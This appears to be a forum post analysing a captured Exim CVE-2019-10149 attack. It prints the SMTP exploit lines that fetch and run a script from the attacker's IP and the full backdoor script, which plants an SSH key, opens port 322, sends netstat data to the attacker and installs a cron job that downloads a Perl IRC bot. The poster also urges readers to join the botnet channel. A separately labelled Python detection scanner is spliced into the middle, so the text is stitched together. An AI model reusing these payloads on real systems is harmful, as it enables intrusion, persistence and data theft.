
email from service.com twink mycron CVE 2019-10149

CVE 2019-10149

CODE:
    [1585319348.11][45.148.10.84:44220] HELO service.com
    [1585319348.12][45.148.10.84:44220] MAIL FROM: <support@service.com>
    [1585319348.13][45.148.10.84:44220] RCPT TO: <root+${run{\\\\x2Fbin\\\\x2Fsh\\\    -c\\\    \\\\x22wget\\\\x2045.148.10.84\\\\x2fss\\\\x20-Osxs\\\\x3bchmod\\\\x20\\\\x2bx\\\\x20sxs\\\\x3b.\\\\x2fsxs\\\\x22}}@mail.grospolina.org>
    [1585319348.15][45.148.10.84:44220] RCPT TO:<root+${run{\\\\x2Fbin\\\\x2Fsh\\\    -c\\\    \\\\x22wget\\\\x2045.148.10.84\\\\x2fss\\\\x20-Osxs\\\\x3bchmod\\\\x20\\\\x2bx\\\\x20sxs\\\\x3b.\\\\x2fsxs\\\\x22}}@grospolina.org>
    [1585319348.16][45.148.10.84:44220] RCPT TO:<root+${run{\\\\x2Fbin\\\\x2Fsh\\\    -c\\\    \\\\x22wget\\\\x2045.148.10.84\\\\x2fss\\\\x20-Osxs\\\\x3bchmod\\\\x20\\\\x2bx\\\\x20sxs\\\\x3b.\\\\x2fsxs\\\\x22}}@localhost>
    [1585319348.18][45.148.10.84:44220] DATA
    [1585319348.19][45.148.10.84:44220] Received: 1\\r\\nReceived: 2\\r\\nReceived: 3\\r\\nReceived: 4\\r\\nReceived: 5\\r\\nReceived: 6\\r\\nReceived: 7\\r\\nReceived: 8\\r\\nReceived: 9\\r\\nReceived: 10\\r\\nReceived: 11\\r\\nReceived: 12\\r\\nReceived: 13\\r\\nReceived: 14\\r\\nReceived: 15\\r\\nReceived: 16\\r\\nReceived: 17\\r\\nReceived: 18\\r\\nReceived: 19\\r\\nReceived: 20\\r\\nReceived: 21\\r\\nReceived: 22\\r\\nReceived: 23\\r\\nReceived: 24\\r\\nReceived: 25\\r\\nReceived: 26\\r\\nReceived: 27\\r\\nReceived: 28\\r\\nReceived: 29\\r\\nReceived: 30\\r\\nReceived: 31\\r\\n
    [1585319348.21][45.148.10.84:44220] QUIT
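As an added detection example (not part of the original post), a small Python scanner for transcripts in the honeypot's log format: it flags RCPT TO local parts that carry Exim expansion items such as the ${run{...}} seen above, decodes the \xNN escapes to show the embedded command, and counts stacked Received: headers. The sample transcript, its peer address and its command are constructed.

```python
import re
# Constructed SMTP transcript in the honeypot's log format (sample data, not the capture above).
SAMPLE_TRANSCRIPT = """\
[1585319348.11][203.0.113.5:44220] HELO service.com
[1585319348.12][203.0.113.5:44220] MAIL FROM: <support@service.com>
[1585319348.13][203.0.113.5:44220] RCPT TO: <root+${run{\\x2Fbin\\x2Fsh\\t-c\\t\\x22id\\x22}}@example.org>
[1585319348.14][203.0.113.5:44220] RCPT TO:<alice+newsletter@example.org>
[1585319348.15][203.0.113.5:44220] DATA
[1585319348.16][203.0.113.5:44220] Received: 1\\r\\nReceived: 2\\r\\nReceived: 3\\r\\n
"""

LINE_RE = re.compile(r"^\[(?P<ts>[\d.]+)\]\[(?P<peer>[^\]]+)\]\s*(?P<rest>.*)$")
RCPT_RE = re.compile(r"^RCPT TO:\s*<(?P<local>[^@>]*)@(?P<domain>[^>]*)>", re.I)
# Exim expansion items that run code or read files; ${run{...}} is the CVE-2019-10149 vector.
EXPANSION_RE = re.compile(r"\$\{\s*(run|readfile|readsocket|perl|dlfunc)\s*\{", re.I)
# Exim-style escapes the exploit uses for characters the address parser would reject.
ESCAPE_RE = re.compile(r"\\x([0-9a-fA-F]{2})|\\([tn\\])")
RECEIVED_HEADERS_MAX = 30  # Exim default; more is treated as a mail loop and bounced

def decode_exim_escapes(s):
    """Decode \\xNN, \\t, \\n and \\\\ into the characters Exim expands them to."""
    def repl(m):
        if m.group(1):
            return chr(int(m.group(1), 16))
        return {"t": "\t", "n": "\n", "\\": "\\"}[m.group(2)]
    return ESCAPE_RE.sub(repl, s)

def extract_run_command(local):
    """Return the decoded command inside ${run{...}}, or None if there is none."""
    m = re.search(r"\$\{run\{(.*)\}\}", local, re.I | re.S)
    return decode_exim_escapes(m.group(1)) if m else None

def scan_transcript(text):
    findings, received = [], 0
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        rest = m.group("rest")
        r = RCPT_RE.match(rest)
        if r and EXPANSION_RE.search(r.group("local")):
            findings.append({"kind": "expansion-in-rcpt", "ts": m.group("ts"),
                             "peer": m.group("peer"), "domain": r.group("domain"),
                             "command": extract_run_command(r.group("local"))})
        received += rest.count("Received:")
    if received > RECEIVED_HEADERS_MAX:
        findings.append({"kind": "received-header-stuffing", "count": received})
    return findings
```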


It's in the fridge: fridged

The attack continues.
We download the script ss:

CODE:
    wget 45.148.10.84/ss
    --2020-03-27 17:35:49--  http://45.148.10.84/ss
    Verbindungsaufbau zu 45.148.10.84:80 … verbunden.
    HTTP-Anforderung gesendet, auf Antwort wird gewartet … 200 OK
    Länge: 1337 (1,3K) [text/plain]
    Wird in »ss« gespeichert.

    ss                                              100%[=======================================================================================================>]   1,31K  --.-KB/s    in 0s

    2020-03-27 17:35:50 (172 MB/s) - »ss« gespeichert [1337/1337]

LEEEEEEEEET!!!11

This is also in the FRIDGE:
fridged ss

...otherwise:

CODE:
    VODKA@SLAPTOP ~
    $ cat ss
    #!/bin/bash
    exists=$(grep -c "^jkl:" /etc/passwd)
    if [ $exists -eq 0 ]; then
    chattr -isa /root/.ssh/authorized_keys
    echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCtI3JzaABDotq1IL3m3KCpwMdGCY+Jr5CGbnznw4QPvVh139jplKrTxm7/3bLdfiLXtkmZfQBiWykH1zi0boA4Tdpw2VJAP9cJL7aru3yX6Zp9Ipo8BdwHHx/KCvLeT9zXosdFCGMyrLZySvhLs3ndqcKOLnQiEAwctaMQxH6hyuRo7Ao5xHTQuYHPVLjNQcZ4as2lFmSEHciPaRda7qgOapWXJdFscwiCyfjxoXOvhRLIb9zVuyvYIc+/X3lufaBrr5G7ElnEfV9/82D9GEOfIXXmLpbSmk5jnu66AXPk4KepTzFx3orvQA7Vk84YsWQDxcyiw78nCvICk1S30YtJ root@' >/root/.ssh/authorized_keys
    /usr/sbin/sshd -p 322
    /sbin/iptables -I OUTPUT -p tcp --dport 322 -j ACCEPT >/dev/null 2>&1
    /sbin/iptables -I INPUT -p tcp --dport 322 -j ACCEPT >/dev/null 2>&1
    /sbin/iptables-save >/dev/null 2>&1
    /usr/sbin/iptables -I OUTPUT -p tcp --dport 322 -j ACCEPT >/dev/null 2>&1
    /usr/sbin/iptables -I INPUT -p tcp --dport 322 -j ACCEPT >/dev/null 2>&1
    /usr/sbin/iptables-save >/dev/null 2>&1
    data2=`netstat -natp |grep sshd|base64`
    wget -q --post-data "DATA=dGlua2QK&DATA2=$data2" 45.148.10.84/.z/p.php -O /dev/null
    cd /tmp
    echo 'cd /tmp;wget 45.148.10.84/r.png;perl r.png;rm -fr r.png' > twink
    echo 'crontab -l|grep -v twink > /tmp/mycron;crontab /tmp/mycron;rm -fr /tmp/twink' >> twink
    echo '* * * * * /tmp/twink' >mycron
    crontab -l >> mycron
    chmod +x /tmp/twink
    crontab mycron;rm -fr mycron
    else
    exit
    fi
...and finally it downloads a Perl IRC bot
that connects to 45.148.10.84 on ports 21, 8080 and 9999.
I'll put it in the FRIDGE:
Jericho Perl IRCbot
Go ahead and use the nick "adolf", it's not in the list. :-)
channel: #root

Here's another glimpse:

CODE:
    PORT     STATE SERVICE VERSION
    21/tcp   open  irc     UnrealIRCd
    |_ftp-bounce: ERROR: Script execution failed (use -d to debug)
    22/tcp   open  ssh     OpenSSH 5.3 (protocol 2.0)
    | ssh-hostkey:
    |   1024 c8:74:2c:69:1e:8f:31:e2:c2:1f:9a:6a:f9:07:52:68 (DSA)
    |_  2048 91:18:7e:69:82:5f:86:6a:ed:a0:1c:c6:38:a7:4a:6c (RSA)
    80/tcp   open  http    Apache httpd 2.2.15 ((CentOS))
    | http-methods:
    |   Supported Methods: GET HEAD POST OPTIONS TRACE
    |_  Potentially risky methods: TRACE
    |_http-server-header: Apache/2.2.15 (CentOS)
    |_http-title: Apache HTTP Server Test Page powered by CentOS
    322/tcp  open  ssh     OpenSSH 5.3 (protocol 2.0)
    | ssh-hostkey:
    |   1024 c8:74:2c:69:1e:8f:31:e2:c2:1f:9a:6a:f9:07:52:68 (DSA)
    |_  2048 91:18:7e:69:82:5f:86:6a:ed:a0:1c:c6:38:a7:4a:6c (RSA)
    5432/tcp open  irc     UnrealIRCd
    6969/tcp open  irc     UnrealIRCd
    8080/tcp open  irc     UnrealIRCd
    9999/tcp open  irc     UnrealIRCd
